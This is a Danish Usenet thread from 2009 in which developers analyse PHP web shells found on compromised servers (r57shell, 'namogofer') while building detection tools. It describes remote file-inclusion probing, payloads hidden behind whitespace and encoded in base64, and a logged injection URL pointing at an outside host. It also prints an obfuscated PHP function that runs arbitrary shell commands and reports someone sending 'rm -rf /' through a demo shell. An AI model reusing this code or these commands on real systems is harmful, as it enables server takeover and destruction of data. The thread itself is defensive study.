---

Kom lige til at tænke over, at man kunne/kan bruge den viden, der ligger hos
svineørerne mod dem selv.

Her er et, ja jeg vil nok kalde det et - kontrolpanel:
<http://w-o-p-r.dk/downloads/kontrolpanel.zip>

BTW - Jeg er ikke den store PHP-haj, men det kunne være interessant, hvis
der er nogle, der ville elaborere over mulighederne af et sådant script.

Måske kunne man bruge det som undervisningsmateriale - ?

--
Med venlig hilsen
Stig Johansen

---

Stig Johansen wrote:
> Kom lige til at tænke over, at man kunne/kan bruge den viden, der ligger hos
> svineørerne mod dem selv.
>
> Her er et, ja jeg vil nok kalde det et - kontrolpanel:
> <http://w-o-p-r.dk/downloads/kontrolpanel.zip>

Og mit virusprogrammer brokker sig over det er en virus? WTF

--
Johan Holst Nielsen
Freelance PHP Developer - http://phpgeek.dk

---

Stig Johansen wrote:
> Kom lige til at tænke over, at man kunne/kan bruge den viden, der ligger hos
> svineørerne mod dem selv.
>
> Her er et, ja jeg vil nok kalde det et - kontrolpanel:
> <http://w-o-p-r.dk/downloads/kontrolpanel.zip>

Nu har jeg ikke analyseret koden (har ikke tid lige nu) men den fil der
ligger inde i kontrolpanel.zip SKAL IKKE EKSKVERES PÅ EN SERVER!

Det ser lidt skummelt ud det kode der er der imo!

--
Johan Holst Nielsen
Freelance PHP Developer - http://phpgeek.dk

---

Johan Holst Nielsen wrote:
> Stig Johansen wrote:
>> Kom lige til at tænke over, at man kunne/kan bruge den viden, der
>> ligger hos
>> svineørerne mod dem selv.
>>
>> Her er et, ja jeg vil nok kalde det et - kontrolpanel:
>> <http://w-o-p-r.dk/downloads/kontrolpanel.zip>
>
> Nu har jeg ikke analyseret koden (har ikke tid lige nu) men den fil der
> ligger inde i kontrolpanel.zip SKAL IKKE EKSKVERES PÅ EN SERVER!
>
> Det ser lidt skummelt ud det kode der er der imo!

(Flot jeg læste ikke indlægget færdig igennem - kan godt se Stig
allerede ved hvad det er der er der... men stadig - pas på folkens :)).

Og ja - jeg vil kigge lidt nærmere på den senere :)

Sorry for det lidt hurtige udbrud :) Troede det var en fejl ;)

--
Johan Holst Nielsen
Freelance PHP Developer - http://phpgeek.dk

---

Johan Holst Nielsen wrote:

> Sorry for det lidt hurtige udbrud :) Troede det var en fejl ;)

Det var et forsøg på vidensdeling om hvad svineørerne laver :)

--
Med venlig hilsen
Stig Johansen

---

Stig Johansen skrev:
> Kom lige til at tænke over, at man kunne/kan bruge den viden, der ligger hos
> svineørerne mod dem selv.
>
> Her er et, ja jeg vil nok kalde det et - kontrolpanel:
> <http://w-o-p-r.dk/downloads/kontrolpanel.zip>
>
> BTW - Jeg er ikke den store PHP-haj, men det kunne være interessant, hvis
> der er nogle, der ville elaborere over mulighederne af et sådant script.
>
> Måske kunne man bruge det som undervisningsmateriale - ?

Du kan få et hurtigt kig her:
<url: http://err0r.dk/r57shell/>

Scriptet tillader dig at gøre meget og fortæller dig nogle spændende
ting om serveren, så det er ikke en god idé at have den liggende.

Sidens indhold giver dig en idé om hvad der skulle forestilles at være
muligt.

Sletter den igen i løbet af i aften...

--
Dan Storm - storm at err0r dot dk / http://err0r.dk

People who claim they don't let little things bother
them have never slept in a room with a single mosquito.

---

Dan Storm wrote:

> Du kan få et hurtigt kig her:
> <url: http://err0r.dk/r57shell/>

Har kigget, tak for det.

> Sidens indhold giver dig en idé om hvad der skulle forestilles at være
> muligt.

Ja, der var en årsag til jeg ville kalde 'kontrolpanel' eller
'administrationskit'

> Sletter den igen i løbet af i aften...

Det er nok ikke en god idé at have den liggende, men tak fordi du gav en
demo - skynd dig at slette den igen :)

Namogofer'en er dog langt værre(i sin opbygning).
Dem der evt. er interesseret kan søge efter namogofer.php på Google.

Jeg har ikke til hensigt at blive udnævnt til placeholder for malware ;)

--
Med venlig hilsen
Stig Johansen

---

Stig Johansen skrev:
> Ja, der var en årsag til jeg ville kalde 'kontrolpanel' eller
> 'administrationskit'

Det er nok det man populært kalder et defacing tool. Never the less -
still harmful.

> Det er nok ikke en god idé at have den liggende, men tak fordi du gav en
> demo - skynd dig at slette den igen :)

Den er hermed slettet. :)

Dog vil jeg ikke lige lade det passere at der er nogle Fullrate kunder
samt en enkelt Cybercity ADSL kunde der bør skamme sig - selvom det er
fristende at lige 'prøve grænserne af', synes jeg ikke det er at
værdsætte mit forsøg på at vise gruppen her hvilke (skadelige)
muligheder værktøjet gav, ved at sende skadelige kommandoer igennem
scriptet. Det var absolut unødvendigt og jeg er ked af at jeg bliver nød
til at være opmærksom på sådanne hændelser.

> Namogofer'en er dog langt værre(i sin opbygning).
> Dem der evt. er interesseret kan søge efter namogofer.php på Google.

Jeg vil også forsøge mig med den, så - det vigtigste er jo at forstå
hvad det er vi skal være opmærksom på. :) Jeg har, ud fra visse defacing
tools jeg har stødt på, været igang med et mindre projekt der scanner
ens website fra en angivet rod via FTP for at udpege skadelig kode -
r57shell er nu også tilføjet. namogofer vil jeg selvfølgelig også gerne
have som en del af listen :)

>
> Jeg har ikke til hensigt at blive udnævnt til placeholder for malware ;)
>

;)


--
Dan Storm - storm at err0r dot dk / http://err0r.dk

People who claim they don't let little things bother
them have never slept in a room with a single mosquito.

---

Dan Storm wrote:

> Stig Johansen skrev:
>> Ja, der var en årsag til jeg ville kalde 'kontrolpanel' eller
>> 'administrationskit'
>
> Det er nok det man populært kalder et defacing tool. Never the less -
> still harmful.

Det er nok et spørgsmål om ordvalg og betydning.
Hvis nogen siger defacing til mig, associerer jeg det med erstatning af
tekster med 'Kilroy was here' og den slags.

Med det her tool kan man reelt 'kontrollere' serveren, lave
<script>/<iframe> injection, FTP'e filer frem og tilbage osv.

Det er næsten et all-mighty-swiss-army-knife tool (synes jeg).

> Dog vil jeg ikke lige lade det passere at der er nogle Fullrate kunder
> samt en enkelt Cybercity ADSL kunde der bør skamme sig - selvom det er
> fristende at lige 'prøve grænserne af', synes jeg ikke det er at
> værdsætte mit forsøg på at vise gruppen her hvilke (skadelige)
> muligheder værktøjet gav, ved at sende skadelige kommandoer igennem
> scriptet.

Enig, og jeg håber ikke der er sket skade, for så vil jeg næsten føle mig
medskyldig ved at præsentere koden i første omgang.

>> Namogofer'en er dog langt værre(i sin opbygning).
>> Dem der evt. er interesseret kan søge efter namogofer.php på Google.
>
> Jeg vil også forsøge mig med den, så - det vigtigste er jo at forstå
> hvad det er vi skal være opmærksom på. :)

Det jeg mente med opbygning var ikke selve koden, men hele konceptet.
Den er baseret på remote PHP execution, og al remote kode ligger
selvfølgelig på placeholders (uskyldige servere).

Konceptet er:
Phase I:
Bot'er laver low frequency probes på remote execution, hvor koden kun
indeholder echo md5("just_a_test")
Det opdagede vi sidste år, under nogle undersøgelser.
For at se hvad det her skulle gå ud på, lavede jeg en 'fiskesnøre', hvor jeg
via ASP returnerede det forventede svar hvis det var sådan en forespørgsel.
Interssant var det, at der gik ikke mange minutter før et væld af andre
bot'er kom med
Phase II:
Ud fra URL'en fra Phase I, bliver der installeret en namogofer.php i
samtlige directories fra roden og ned.
Resultatat med lokationer og antal bliver returneret til bot'en.

Namogofer.php indeholder en del md5 kontroller, så vi besluttede, at vi ikke
turde køre videre med simuleringen.

Men hvis du kigger på koden, kan du se, at den kører det PHP, der ligger i
en POST variabel, altså en hviklen som helst kode.

Da det ikke bliver gemt (måske i /tmp - husker det ikke lige), er der ikke
spor af hvad der i virkeligen er foregået.

Jeg husker ikke hvordan, men jeg faldt over nærmest et SDK, som også
indeholdt en funktion til at fjerne de installerede instanser af
namogofer.php

Nu her jeg i sagens natur ikke afprøvet tingene i det virkelige liv, men du
kan godt se muligheden.

Man behøver blot at have en central database med de URL'er, der er åbne for
remote execution, og det behøver offeret ikke nødvendigvis vide noget om.

Når man så vil lave noge på en server, så gør man bare:
1) initierer installation af namogofer
2) kalder den med det man nu vil udføre, måske et spam run
3) afinstallerer lortet igen, så der intet spor er af hændelsen bortset fra
evt. logfiler.

Det 'SDK' jeg faldt over var dataret i 2006, men en anden ting jeg faldt
over var dannelsen af en fil, der udelukkende indeholdt en md5 sum.

En søgning på Google med denne streng returnerede en del inficerede servere,
og en af dem (filen) var dateret i 2004.

For mig er det et bevis på, at den har eksisteret i 5 år, og har formået at
undgå 'offentligheden'.

En søgning på namogofer giver heller ikke særlig mange facts.

Det er lidt uhyggeligt, for den centrale database kan sagtens indeholde
millioner af URL's til senere brug.

Jeg kalder det et virtuelt botnet, og det svarer lidt til, at en indbrudstyv
går rundt og tjekker om dørene er åbne.
Uden at tage noget, blot notere at her er der 'bid'.

> Jeg har, ud fra visse defacing
> tools jeg har stødt på, været igang med et mindre projekt der scanner
> ens website fra en angivet rod via FTP for at udpege skadelig kode -
> r57shell er nu også tilføjet. namogofer vil jeg selvfølgelig også gerne
> have som en del af listen :)

Jeg lavede det her 'Storm Monitor' projekt sidste år.
Det er en lidt anden indfaldsvinkel, men det går kort sagt ud på at have en
decentral database med filnavne,størrelser,last modified.

Med givne intervaller kaldes serveren op, for at tjekke
ændringer/tilføjelser.
Hvis der er ændringer/tilføjelser logges disse, og der sendes en mail med
oplysningerne.

På den måde finder man også evt. script injections, 'uskydige' .txt filer,
phishing sites osv.

Men det kræver en fysisk fil ligesom dit koncept.
Hvis amogofere'en 'kommer skyder og går' inden for intervallet, vil den ikke
finde noget.

Nu ved jeg ikke hvordan du udpeger 'skadelig kode', men namogofer'en behøver
ikke hedde namogofer længere. Det er blot at ændre fil navnet i
installations scriptet og i oprydningsscriptet, så den kan hedde
hvadsomhelst og befinde sig hvorsomhelst.

Hvis du er interesseret i noget af det her kode jeg snakker om, vil jeg godt
prøve at se hvad jeg har, og maile det til dig.

Formålet med vores undersøgelse var mere på metode planet, og ikke
detaljerede filer, så jeg husker ikke hvad jeg har gemt.

Det er muligt nogle af disse filer kun eksisterer oppe i mit hovede.

--
Med venlig hilsen
Stig Johansen

---

Stig Johansen skrev:
> Det er nok et spørgsmål om ordvalg og betydning.
> Hvis nogen siger defacing til mig, associerer jeg det med erstatning af
> tekster med 'Kilroy was here' og den slags.
>
> Med det her tool kan man reelt 'kontrollere' serveren, lave
> <script>/<iframe> injection, FTP'e filer frem og tilbage osv.
>
> Det er næsten et all-mighty-swiss-army-knife tool (synes jeg).

Ja, det var egentlig en meget passende beskrivelse :)
>
> Enig, og jeg håber ikke der er sket skade, for så vil jeg næsten føle mig
> medskyldig ved at præsentere koden i første omgang.
>

Well, hvis der var sket skade, hvilket der heldigvis ikke er, kan jeg jo
kun takke mig selv. Jeg tog chancen og lagde scriptet op, så ansvaret
hvilet hos mig selv. :)

> Det jeg mente med opbygning var ikke selve koden, men hele konceptet.
> Den er baseret på remote PHP execution, og al remote kode ligger
> selvfølgelig på placeholders (uskyldige servere).

Nu har jeg ikke selv gået så meget ind i det, men det er præcist scripts
som disse vi har haft flest problemer med (særligt på PHP4 servere) når
kunder har haft usikre applikationer - vi havde blandt andet en kunde
som pludselig hostede ghostpages for poker og porno hjemmesider. Enkelte
blev defacet som følge af disse scripts.

>
> [SNIP]
>
> Nu her jeg i sagens natur ikke afprøvet tingene i det virkelige liv, men du
> kan godt se muligheden.

Det lyder som om du får foretaget nogle interessante tests ;)

> En søgning på Google med denne streng returnerede en del inficerede servere,
> og en af dem (filen) var dateret i 2004.

Det er lidt skræmmende at der alligevel ikke skal mere til - særligt
også fordi mange mennesker også lader deres hjemmesider stå, så længe
det virker og ikke bemærker det.

> Jeg kalder det et virtuelt botnet, og det svarer lidt til, at en indbrudstyv
> går rundt og tjekker om dørene er åbne.
> Uden at tage noget, blot notere at her er der 'bid'.

Jeg kan nemt følge dig - og det er sikkert også den rigtige måde at se
det på.

> Jeg lavede det her 'Storm Monitor' projekt sidste år.

Ja, det husker jeg.

> Det er en lidt anden indfaldsvinkel, men det går kort sagt ud på at have en
> decentral database med filnavne,størrelser,last modified.
>
> Med givne intervaller kaldes serveren op, for at tjekke
> ændringer/tilføjelser.
> Hvis der er ændringer/tilføjelser logges disse, og der sendes en mail med
> oplysningerne.
>
> På den måde finder man også evt. script injections, 'uskydige' .txt filer,
> phishing sites osv.

Jeg synes det er en god idé og det er nem og effektiv måde at holde øje
med sine filer og sin sikkerhed på.

> Men det kræver en fysisk fil ligesom dit koncept.
> Hvis amogofere'en 'kommer skyder og går' inden for intervallet, vil den ikke
> finde noget.

Det var en problematik jeg ikke lige havde tænkt over, men nu er da
pointeret.

>
> Nu ved jeg ikke hvordan du udpeger 'skadelig kode', men namogofer'en behøver
> ikke hedde namogofer længere. Det er blot at ændre fil navnet i
> installations scriptet og i oprydningsscriptet, så den kan hedde
> hvadsomhelst og befinde sig hvorsomhelst.

Jeg gennemlæser filens indhold og leder efter strenge som er
karakteristiske i forhold til de skadelige scripts.

> Hvis du er interesseret i noget af det her kode jeg snakker om, vil jeg godt
> prøve at se hvad jeg har, og maile det til dig.

Meget gerne :)

>
> Formålet med vores undersøgelse var mere på metode planet, og ikke
> detaljerede filer, så jeg husker ikke hvad jeg har gemt.
>
> Det er muligt nogle af disse filer kun eksisterer oppe i mit hovede.

Det kender jeg kun alt for godt ;)


--
Dan Storm - storm at err0r dot dk / http://err0r.dk

People who claim they don't let little things bother
them have never slept in a room with a single mosquito.

---

Dan Storm wrote:

> Stig Johansen skrev:
>> Hvis du er interesseret i noget af det her kode jeg snakker om, vil jeg
>> godt prøve at se hvad jeg har, og maile det til dig.
>
> Meget gerne :)

Mail sendt med lidt 'weekend læsning' :)
(Hvis jeg ikke har REMOVE'et for meget)

--
Med venlig hilsen
Stig Johansen

---

Stig Johansen wrote:

> Dan Storm wrote:
>
>> Stig Johansen skrev:
>>> Hvis du er interesseret i noget af det her kode jeg snakker om, vil jeg
>>> godt prøve at se hvad jeg har, og maile det til dig.
>>
>> Meget gerne :)

Du må gerne give et praj om du har modtaget mailen.
Jeg har brugt den adresse du anfører her, men er det den rigtige ?
(Jeg har fjernet _REMOVETHIS_)

--
Med venlig hilsen
Stig Johansen

---

Stig Johansen skrev:
> Du må gerne give et praj om du har modtaget mailen.

Jeg beklager :) Jeg har modtaget mailen og er allerede godt igang at
kigge på nogle af scriptsene. :)

Nogle af dem er relativt nemme at gennemskue og nogle enkelte skal lige
'oversættes' fra volapyk til noget mere forståeligt for at give det
mening...

Men jeg er skam i gang :)

> Jeg har brugt den adresse du anfører her, men er det den rigtige ?
> (Jeg har fjernet _REMOVETHIS_)

Well, jeg bruger nu den i min signatur, men da det virker mest naturligt
at antage at min afsenderadresse er korrekt angivet (på nær _REMOVETHIS_
delen) måtte den nødvendigvis være mulig at modtage mail på. :)

--
Dan Storm - storm at err0r dot dk / http://err0r.dk

Tro ikke brugerne vil gøre noget for at undgå dit killfilter
- Så vigtig er du heller ikke!

---

Dan Storm wrote:

> Stig Johansen skrev:
>> Du må gerne give et praj om du har modtaget mailen.
>
> Jeg beklager :) Jeg har modtaget mailen og er allerede godt igang at
> kigge på nogle af scriptsene. :)

Det var ikke noget med 'beklager', men jeg blev nødt til at lægge det som et
link, da Google(gmail) brokkede sig over jeg tilsyneladende ville forsøge
at sende 'mærkelige ting'.

Jeg har nu fjernet (zip) filen igen, så den ikke ligger til download.

> Nogle af dem er relativt nemme at gennemskue og nogle enkelte skal lige
> 'oversættes' fra volapyk til noget mere forståeligt for at give det
> mening...

Ja, det er en 'pærevælling'.
De scripts er nogle jeg har afprøvet med kommandoversionen af PHP.
Nu nævnte jeg tidligere namogofer'en, og basalt består den at
installationskittet - jeg tror den ligger under stage.2.php og
afinstallationescriptet har jeg vist gemt under unlink.php
resten er 'alt godt fra havet'.

> Men jeg er skam i gang :)

Jeg fandt ud af, at jeg havde gemt en kopi af det der site, hvor der ligger,
nærmest et SDK'.

Hvis du vil have en kopi af det, så giv et praj.
Men det er ca. 400 directories med alle mulige - 'ting' - til inspiration.

>> Jeg har brugt den adresse du anfører her, men er det den rigtige ?
>> (Jeg har fjernet _REMOVETHIS_)
>
> Well, jeg bruger nu den i min signatur, men da det virker mest naturligt
> at antage at min afsenderadresse er korrekt angivet (på nær _REMOVETHIS_
> delen) måtte den nødvendigvis være mulig at modtage mail på. :)

Ja, og jeg bruger en helt valid email adresse, men det er altså ikke alle
der gør det.

Nogle gør det, og andre gør det ikke, og nogle laver en dedikeret
emailadresse til nyhedsgrupper, der ryger direkte i bitspanden.

--
Med venlig hilsen
Stig Johansen

---

Stig Johansen skrev:
> Det var ikke noget med 'beklager', men jeg blev nødt til at lægge det som et
> link, da Google(gmail) brokkede sig over jeg tilsyneladende ville forsøge
> at sende 'mærkelige ting'.

Besynderligt at man ikke vil tillade at sende zip filer. :/

> De scripts er nogle jeg har afprøvet med kommandoversionen af PHP.
> Nu nævnte jeg tidligere namogofer'en, og basalt består den at
> installationskittet - jeg tror den ligger under stage.2.php og
> afinstallationescriptet har jeg vist gemt under unlink.php
> resten er 'alt godt fra havet'.

Ja, jeg kan godt se der ligger mange skønne ting.
Det bliver spændende at få det udredet og klarlagt mulighederne i det.

> Jeg fandt ud af, at jeg havde gemt en kopi af det der site, hvor der ligger,
> nærmest et SDK'.
>
> Hvis du vil have en kopi af det, så giv et praj.
> Men det er ca. 400 directories med alle mulige - 'ting' - til inspiration.

Meget gerne - jeg finder det uhyre interessant at se hvordan scripts
vil/kan misbruge de sårbarheder der er i systemerne - på den måde kan
man også hurtigt blive inspireret til at lave bedre løsninger...


--
Dan Storm - storm at err0r dot dk / http://err0r.dk

Tro ikke brugerne vil gøre noget for at undgå dit killfilter
- Så vigtig er du heller ikke!

---

Dan Storm wrote:

> Stig Johansen skrev:
>> Det var ikke noget med 'beklager', men jeg blev nødt til at lægge det som
>> et link, da Google(gmail) brokkede sig over jeg tilsyneladende ville
>> forsøge at sende 'mærkelige ting'.
>
> Besynderligt at man ikke vil tillade at sende zip filer. :/

Det er ikke .zip filer generelt, det har jeg sendt før, og har lige testet
igen, dog uden 'mærkelige ting' - det virker fint.

Jeg fik en messagebox med 'illegal attachments', og en henvisning til at
læse guidelines osv.

Jeg vil tro der er tale om en (måske lidt aggresiv) virusscaner, ligesom
Johan tilsyneladende fik virus alert på .zip filen med PHP kode i
(oprindeligt indlæg).

--
Med venlig hilsen
Stig Johansen

---

Dan Storm wrote:

>> Hvis du vil have en kopi af det, så giv et praj.
>> Men det er ca. 400 directories med alle mulige - 'ting' - til
>> inspiration.
>
> Meget gerne - jeg finder det uhyre interessant at se hvordan scripts
> vil/kan misbruge de sårbarheder der er i systemerne - på den måde kan
> man også hurtigt blive inspireret til at lave bedre løsninger...

Mail sendt.

Jeg synes også det er interessant, for det er bedre at kende 'deres våben'
frem for at gætte sig frem.

En af de ting, som også viser hvor snedige er, er opbygningen af index.txt
filer, der ligger i de her directories.
Her skal du være opmærksom på, at de typisk består af 100 linieskift, en
linie med 150 blanke + koden, efterfulgt af 100 linieskift.

I mange editorer vil det blot se ud som en tom fil ved første øjekast.
Så en webmaster der falder over sådan en fil der er landet på serveren, vil
ikke umiddelbart fatte mistanke.

Så vidt jeg kan vurdere, er disse filer blevet brugt som placeholders til
remote execution på andre systemer.

Der er mange filer, men så vidt jeg husker, er der vist mange 'gengangere',
blot med varianter over samme tema.

Men da de er base64 encoded, er der nok til en _del_ timers research :)

--
Med venlig hilsen
Stig Johansen

---

Stig Johansen skrev:
> Mail sendt.

Mailen og filen er modtaget :)

> En af de ting, som også viser hvor snedige er, er opbygningen af index.txt
> filer, der ligger i de her directories.
> Her skal du være opmærksom på, at de typisk består af 100 linieskift, en
> linie med 150 blanke + koden, efterfulgt af 100 linieskift.

Koden er dog alligevel ret overskuelig og væsentligt nemmere at
gennemskue i forhold til noget af det andet jeg fik af dig.

> I mange editorer vil det blot se ud som en tom fil ved første øjekast.
> Så en webmaster der falder over sådan en fil der er landet på serveren, vil
> ikke umiddelbart fatte mistanke.

Simpelt og genialt, faktisk...

> Så vidt jeg kan vurdere, er disse filer blevet brugt som placeholders til
> remote execution på andre systemer.

Ja, typisk ville man have værktøjet i et txt dokument, så et includekald
fra en remote server blot ville eksekvere koden, frem for at inkludere
det allerede eksekverede. Jeg har brugt metoden ofte for at
fremprovokere sikkerhedsfejl.

> Der er mange filer, men så vidt jeg husker, er der vist mange 'gengangere',
> blot med varianter over samme tema.
>
> Men da de er base64 encoded, er der nok til en _del_ timers research :)

Well, jeg skal nok finde ud af det :) Det er trods alt meget spændende... :)


--
Dan Storm - storm at err0r dot dk / http://err0r.dk

Tro ikke brugerne vil gøre noget for at undgå dit killfilter
- Så vigtig er du heller ikke!

---

"Dan Storm" <shadyz_REMOVETHIS_@err0r.dk> wrote in message
news:49d90df0$0$15875$edfadb0f@dtext01.news.tele.dk...
> Stig Johansen skrev:
>
> > Der er mange filer, men så vidt jeg husker, er der vist mange
'gengangere',
> > blot med varianter over samme tema.
> >
> > Men da de er base64 encoded, er der nok til en _del_ timers research :)
>
> Well, jeg skal nok finde ud af det :)

He - ja, jeg er ikke i tvivl om du finder ud af det.
Det var mængen jeg tænkte på - man skal ikke bruge mange minutter pr. fil
før det bliver til en del timer.

> Det er trods alt meget spændende... :)

Jeg kiggede lige for at se om du har fået de ting jeg snakkede om tidligere,
og det ser sådan ud.

Du har sikker funder ud af det, men jeg byttede vist om på nogle navne.
Installationen af namogofer ligge i filen intruders.php, hvorimod den
tidligere nævnet stage.2.php er den, der danner en masse directories med
indledende testdata og .htaccess filer.

Afinstallation af namogofer ligger i unlink.php

Jeg er ked af de underlige og ustrukturerede navne, men jeg gemte dem bare
efterhånden som de dukkede op 'for future use' og analyse.

--
Med venlig hilsen/Best regards
Stig Johansen

---

Stig Johansen skrev:
> He - ja, jeg er ikke i tvivl om du finder ud af det.
> Det var mængen jeg tænkte på - man skal ikke bruge mange minutter pr. fil
> før det bliver til en del timer.

Jeg brugte ihvertfald det meste af aftenen igår på at omstrukture noget
af koden for (min) overskueligheds skyld. Det er, som du siger, en stor
mængde kode som skal decodes, men det der tager længst tid er nok det at
skulle finde de linierne med base64 encoded indhold.
Særligt en af filerne i den første omgang du sendte mig, er lidt speciel
- de fleste base64 encodede strenge er binære data. Så den er jeg lige
igang med at finde ud af hvad kan.

> Du har sikker funder ud af det, men jeg byttede vist om på nogle navne.
> Installationen af namogofer ligge i filen intruders.php, hvorimod den
> tidligere nævnet stage.2.php er den, der danner en masse directories med
> indledende testdata og .htaccess filer.
>
> Afinstallation af namogofer ligger i unlink.php
>
> Jeg er ked af de underlige og ustrukturerede navne, men jeg gemte dem bare
> efterhånden som de dukkede op 'for future use' og analyse.

Indtil videre har det været overskuligt, men man kan godt blive
overvældet af de forskellige filnavne, så jeg er også begyndt at omdøbe
de forskellige filer så jeg får en filmæssig pæn struktur også. :)

--
Dan Storm - storm at err0r dot dk / http://err0r.dk

People who claim they don't let little things bother
them have never slept in a room with a single mosquito.

---

Dan Storm wrote:

> Indtil videre har det været overskuligt, men man kan godt blive
> overvældet af de forskellige filnavne, så jeg er også begyndt at omdøbe
> de forskellige filer så jeg får en filmæssig pæn struktur også. :)

De filenavne er alene mit ansvar ;)
Der var tale om at fange dem efterhånden som de opstod.
Opstod - forstået på den måde, at vi hold øje med logfilerne for intrusion
forsøg.

Namogofer f.eks. kendte jeg kke til da vi startede, og en typisk URI (query
delen) til intrusion forsøg ser sådan ud:
keynav=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F

Filnavnene er så bare lavet ud fra en kort skimming af koden.

Det jeg vil frem til er, at hvis du gemmer filnavn.før og filnavn.nu, kunne
jeg godt tænke mig at omdøbe mine filer til de samme navne.

--
Med venlig hilsen
Stig Johansen

---

"Stig Johansen" <wopr.dk@gmaill.com> wrote in message
news:49dd8250$0$90264$14726298@news.sunsite.dk...
> Namogofer f.eks. kendte jeg kke til da vi startede, og en typisk URI
(query
> delen) til intrusion forsøg ser sådan ud:
>
keynav=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%
2F

Kom i tanke om, at jeg kunne lave et udtræk, og gemme det uformatteret.
Her er et udtræk af de injection forsøg der er lavet.

'Dan' dit eget overblik.
(Nej, det skrev jeg ikke - vel

Men i skrivende stund, så er linket (et af de sidste):
http://www.acb.bs.it/.ssh/cmd
aktivt med indholdet:
......
<?php
echo " xRoot ";
?>
......
Sikkert en bot, der prober for sårbarheder.

--
Med venlig hilsen/Best regards
Stig Johansen

---

Dan Storm wrote:

> Nogle af dem er relativt nemme at gennemskue og nogle enkelte skal lige
> 'oversættes' fra volapyk til noget mere forståeligt for at give det
> mening...

Volapyk - jo en del af det er base64 encoded, og for at undersøge det,
lavede jeg dette tool:
<http://w-o-p-r.dk/wopr.tools/wopr.base64.asp>
(Base64(JS) rutinen har jeg dog stjålet et eller andet sted fra :)

--
Med venlig hilsen
Stig Johansen

---

Stig Johansen skrev:
> Volapyk - jo en del af det er base64 encoded, og for at undersøge det,
> lavede jeg dette tool:
> <http://w-o-p-r.dk/wopr.tools/wopr.base64.asp>
> (Base64(JS) rutinen har jeg dog stjålet et eller andet sted fra :)
>

Jeg tænkte mere på variabel- og funktionsnavne der er navngivet obskurt.

F.eks:

<?php

function t54d54a126a783($o111ca5df4a68b)
{
   $o9b207167e5381 = '';
   if (!empty($o111ca5df4a68b))
   {
      if(function_exists('exec'))
      {
         @exec($o111ca5df4a68b,$o9b207167e5381);
         $o9b207167e5381 = join("\n",$o9b207167e5381);
      }
      elseif(function_exists('shell_exec'))
      {
         $o9b207167e5381 = @shell_exec($o111ca5df4a68b);
      }
      elseif(function_exists('system'))
      {
         @ob_start();
         @system($o111ca5df4a68b);
         $o9b207167e5381 = @ob_get_contents();
         @ob_end_clean();
      }
      elseif(function_exists('passthru'))
      {
         @ob_start();
         @passthru($o111ca5df4a68b);
         $o9b207167e5381 = @ob_get_contents();
         @ob_end_clean();
      }
      elseif(@is_resource($u8fa14cdd754f9 = @popen($o111ca5df4a68b,"r")))
      {
         $o9b207167e5381 = "";
         while(!@feof($u8fa14cdd754f9))
         {
            $o9b207167e5381 .= @fread($u8fa14cdd754f9,1024);
         }
         @pclose($u8fa14cdd754f9);
      }
   }
   
   return $o9b207167e5381;
}

?>

Det er noget der er træls at arbejde med ;)
--
Dan Storm - storm at err0r dot dk / http://err0r.dk

Tro ikke brugerne vil gøre noget for at undgå dit killfilter
- SÃ¥ vigtig er du heller ikke!

---

On Thu, 02 Apr 2009 21:56:00 +0200, Dan Storm
<shadyz_REMOVETHIS_@err0r.dk> wrote:

>Dog vil jeg ikke lige lade det passere at der er nogle Fullrate kunder
>samt en enkelt Cybercity ADSL kunde der bør skamme sig - selvom det er
>fristende at lige 'prøve grænserne af'

Jeg vil da - med lidt røde ører - gerne melde mig som den ene af dem.
Jeg må indrømme, at jeg ikke ud fra tråden forstod, hvad det egentlig
var, dette script skulle kunne - noget med et "kontrolpanel", som man
"måske kunne bruge som undervisningsmateriale".

>synes jeg ikke det er at
>værdsætte mit forsøg på at vise gruppen her hvilke (skadelige)
>muligheder værktøjet gav, ved at sende skadelige kommandoer igennem
>scriptet. Det var absolut unødvendigt og jeg er ked af at jeg bliver nød
>til at være opmærksom på sådanne hændelser.

Jeg er oprigtigt ked af, hvis jeg har gjort noget, som potentielt kunne
have været skadeligt. Men jeg må indrømme,at jeg ikke havde fantasi til
at forestille mig, at nogen lagde et script op på egen server, som
potentielt kunne skade den.

Jeg troede det var "ren demo" - jvf.:
>Sidens indhold giver dig en idé om hvad der skulle forestilles at
>være muligt.

("idé", "forestilles")

Om det så var mig der var uopmærksom i timen, eller om jeg er undskyldt,
må andre dømme om. Men under alle omstændigheder beklager jeg - og
forsikrer, at jeg ikke havde "ond hensigt".



Mvh. Jørn

--
Jørn Andersen,
Brønshøj

---

Jørn Andersen skrev:
> Jeg vil da - med lidt røde ører - gerne melde mig som den ene af dem.
> Jeg må indrømme, at jeg ikke ud fra tråden forstod, hvad det egentlig
> var, dette script skulle kunne - noget med et "kontrolpanel", som man
> "måske kunne bruge som undervisningsmateriale".

Alt forladt - formålet var jo netop at værktøjet skulle 'virke';
forstået på den måde at jeg mener det giver mere værdi at have en demo
af noget du kan se og røre ved en et simpelt screenshot.

> Jeg er oprigtigt ked af, hvis jeg har gjort noget, som potentielt kunne
> have været skadeligt. Men jeg må indrømme,at jeg ikke havde fantasi til
> at forestille mig, at nogen lagde et script op på egen server, som
> potentielt kunne skade den.

Scriptet kunne såmænd heller ikke andet end åbnes - når det blev forsøgt
at eksekvere nogle af funktionerne i værktøjet døde det.

Dog kunne jeg ikke forestille mig at personen som forsøgte at fjerne alt
på min server var dig - der var en enkelt Fullrate kunde som var meget
aggresiv i valget af shell kommandoer (blandt andet 'rm -rf /').


> Jeg troede det var "ren demo" - jvf.:
>> Sidens indhold giver dig en idé om hvad der skulle forestilles at
>> være muligt.
>
> ("idé", "forestilles")

Og du har ret - værktøjet var, som sådan, ubrugeligt.

>
> Om det så var mig der var uopmærksom i timen, eller om jeg er undskyldt,
> må andre dømme om. Men under alle omstændigheder beklager jeg - og
> forsikrer, at jeg ikke havde "ond hensigt".

Alt forladt :) Jeg var nu også mest mere hooked på ham der var meget
aggressiv :)

--
Dan Storm - storm at err0r dot dk / http://err0r.dk

People who claim they don't let little things bother
them have never slept in a room with a single mosquito.

---

On Fri, 03 Apr 2009 10:31:31 +0200, Dan Storm
<shadyz_REMOVETHIS_@err0r.dk> wrote:

>Alt forladt

Tak!

<snip>
>Dog kunne jeg ikke forestille mig at personen som forsøgte at fjerne alt
>på min server var dig

Håber jeg ikke - jeg trykkede på en enkelt knap og fik en respons i
retning af: "Var det nu nødvendigt", hvorefter det gik op for mig, at
det nok ikke var meningen at man skulle "lege"

>- der var en enkelt Fullrate kunde som var meget
>aggresiv i valget af shell kommandoer (blandt andet 'rm -rf /').

Jeg er på Cybercity ...



